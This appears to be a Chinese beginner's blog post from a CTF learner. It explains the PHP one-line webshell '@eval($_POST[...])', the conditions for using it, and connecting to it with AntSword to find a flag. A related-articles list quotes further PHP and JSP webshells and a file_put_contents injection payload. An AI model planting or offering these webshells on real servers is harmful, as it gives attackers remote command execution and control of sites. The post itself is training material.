蚁剑与一句话木马

最新推荐文章于 2024-04-09 02:55:50 发布
最新推荐文章于 2024-04-09 02:55:50 发布
阅读量5.9k 收藏 15
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55771794/article/details/118767852
版权

目录

一句话木马

一个关于php的例子

入侵条件

蚁剑的下载与安装

在安装的时候注意

真题实践

一句话木马

先来说说一句话木马是什么东西

一句话木马,又简称(webshell),在很多渗透测试时,渗透人员会上传一句话木马到目前web服务目录继而提权获取系统权限。

举一个关于php的例子

 <?php @eval($_POST['syc']);?>

它的原理呢,是利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以通过中国菜刀即可获取和控制整个网站目录。

@表示后面即使执行错误,也不报错。

eval()函数表示括号内的语句字符串什么的全都当做代码执行。

$_POST['syc']表示从页面中获得syc这个参数值

入侵条件

        (1)木马上传成功

        (2)知道木马的路径

        (3)木马能够正常运行

如果想要更加详细深入的了解的话,可以看一看这篇文章
https://blog.csdn.net/weixin_39190897/article/details/86772765

蚁剑的下载与安装

蚁剑和菜刀就是使用一句话木马的

这一篇博客里有具体的内容,我就不重复造车了

https://www.fujieace.com/hacker/tools/antsword.html

在安装的时候注意

如果出现白屏的话,可以试试挂加速器

如果代码解析失败,得把两个文件放一起。

我捣鼓了一堆,估计得有几个蚁剑,没关系,能够运行就行!

来一道相关的题,更加深刻的理解一句话木马

真题实践

都说这么明显了,,,,,直接上吧

由于我菜刀老是用不起,,而且蚁剑的功能更好,那我们就用蚁剑

直接添加,然后输入网站url,密码即为Syc,然后就登录成功了,可以看见目录,往下翻到flag,找到了!

 这道题的一句话木马已经上传好了,具体的内容,之后遇见在详细解释吧!

 

Tang_y1
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
一句木马要点和防范注意事项
2401_84235249的博客
06-04 727
一句木马”通常指的是那些简短、易于隐藏或不易被检测到的恶意代码片段,这些代码可能被用于执行恶意活动,如窃取信息、控制受害者的系统等。然而,我必须强调,传播或使用任何形式的恶意软件(包括所谓的“一句木马”)都是非法的,并且严重违反了网络安全和隐私的原则。权限管理:合理设置服务器和应用程序的权限,避免不必要的权限提升,是防止一句木马的重要手段,但这也需要管理员具备一定的安全知识和经验。防止注入:防止代码注入是防止一句木马的关键,但这也是一个技术难题,需要开发者具备一定的安全编程技能。
连接一句木马
m0_64417923的博客
05-18 8260
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句木马上传到网站上, 五,将一句木马复制到网站 不过这次只是测试学习如何使用一句木马的,所以直接将一句木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
一句木马
qq_35856778的博客
09-16 1万+
一、一句木马 <?php @eval($_POST[a]);?> $_POST[这里是连接密码] 二、利用poc在网站目录下插入文件 ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php @eval($_POST[a]); ?>')</php> 将这条代码放到域名后面 三、获取权限 ...
一句木马构造与连接_%&gt;&lt;%eval request((1)
最新发布
m0_60721860的博客
04-09 725
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
最新免杀webshell
07-21
webshell 过世界杀软。带防删功能。提权加强版。
tomcat put方法任意写文件漏洞
weixin_48739941的博客
04-21 2853
(1)cd vulhub/tomcat/CVE-2017-12615 切换目录。 (2) docker-compose up -d 启动。 (3)访问:http://192.168.43.137:8080/ (4)burpsuite抓包。 (5)send to repeater,修改为PUT /l3yx.txt。 (6) docker exec -it 3e7 bash ; cd webapps/ ;cd ROOT ;cat l3yx.txt进入容器,查看。 ...
连接一句木马演示
热门推荐
undefine
12-18 1万+
需要准备 一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。 我这里服务器用win2008R2系统 攻击机用win10 接下来我会演示 php 的一句木马 其他脚本语言的一句木马使用过程和这个差别不大 在服务器上安装phpstudy 快速搭建服务器 安装成功后启动apache 尝试打开网站,看看是否成功 出现下面的页面代表成功 现在服务端就配置成功了 现在在攻击端安装菜刀,等等类似工具,可以去看怎么
java安全——jsp一句木马
m0_46317063的博客
01-31 1万+
java一句木马
jsp小后门
Jiajia2017的博客
12-18 1053
转自  http://zone.wooyun.org/content/17356  园长 一:执行系统命令:无回显执行系统命令:<%Runtime.getRuntime().exec(request.getParameter("i"));%>请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,...
菜刀和一句木马
weixin_44720762的博客
05-02 3813
中国菜刀,一个非常好用而又强大的webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
中国(antSword-master.zip
08-23
用于链接一句木马
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和提权示例(一)1
08-03
中国则用于上传木马、执行命令和提权,例如,作者提到的“一句木马”是Web渗透中常用的一种技巧,可以用来获得远程命令执行的能力。 提权是渗透测试中的关键环节。在文中,作者提到了的使用来提升权限,...
免杀PHP大马过狗
06-13
PHP后门通常是一段简短的、能够执行特定命令的PHP代码,被称为“一句木马”,这与给定的标签“一句”相符。这些后门可能隐藏在正常代码中,或者伪装成看似无害的文件,例如在本例中的“php免杀大马过狗狗.php”...
upload-labs一到二十一关解题总结
03-18
- 使用等工具,输入刚才复制的URL以及一句木马的密码,进行远程连接测试。 - 如果连接成功,则表示远程控制已经实现。 #### Pass-02: 处理文件类型限制 在第二关中,上传PHP文件时会收到错误提示:“文件...
jsp一句木马
jennycisp的博客
12-25 2907
密码为 passwd。
中国安装教程——antsword及webshell一句木马
qq_53099802的博客
04-22 7382
antsword与php一木马
一句木马:JSP篇
09-21 8722
JSP一句收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
一句木马、sql注入、的安装及使用
veinard_F的博客
05-20 4209
一、基本原理 sql注入主要目标是 Web 应用的后台数据库,从数据库中获取信息和授予较高的权限。它先破坏数据库,再对数据库服务器进行破坏。 sql的概述 浏览网站 发送一个请求SQL语言指令返回数据或执行结果通过web包装后的数据用户web服务端数据库系统 基本类型: 数字型和字符型的注入; 报错型SQL注入; 布尔/时间的SQL注入; 可联合查询的SQL注入; 判断注入类型: 1、数字型注入:id=1 and 1=2,若回显不正常则为数字型注入 2、字符型注入:上述测试若回显正常则为字符型注入 3、报错
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值